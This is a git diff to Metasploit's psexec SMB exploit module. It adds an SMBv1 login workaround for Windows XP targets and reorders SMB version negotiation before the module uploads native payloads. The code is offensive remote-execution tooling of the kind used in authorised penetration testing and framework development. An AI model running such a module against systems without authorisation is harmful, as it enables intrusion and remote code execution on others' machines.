diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index c271ee45e2..23620231d6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -86,12 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def native_upload_with_workaround + # Avoid implementing NTLMSSP on Windows XP + # http://seclists.org/metasploit/2009/q1/6 + if smb_peer_os == "Windows 5.1" + connect(versions: [1]) + smb_login + end + native_upload(datastore['SHARE']) + end + def exploit print_status("Connecting to the server...") - connect(versions: [1,2]) + connect(versions: [2,1]) print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") - smb_login() + smb_login if not simple.client.auth_user and not datastore['ALLOW_GUEST'] print_line(" ") @@ -117,12 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote execute_powershell_payload else print_status('Selecting native target') - native_upload(datastore['SHARE']) + native_upload_with_workaround end when 'PowerShell' execute_powershell_payload when 'Native upload' - native_upload(datastore['SHARE']) + native_upload_with_workaround when 'MOF upload' mof_upload(datastore['SHARE']) end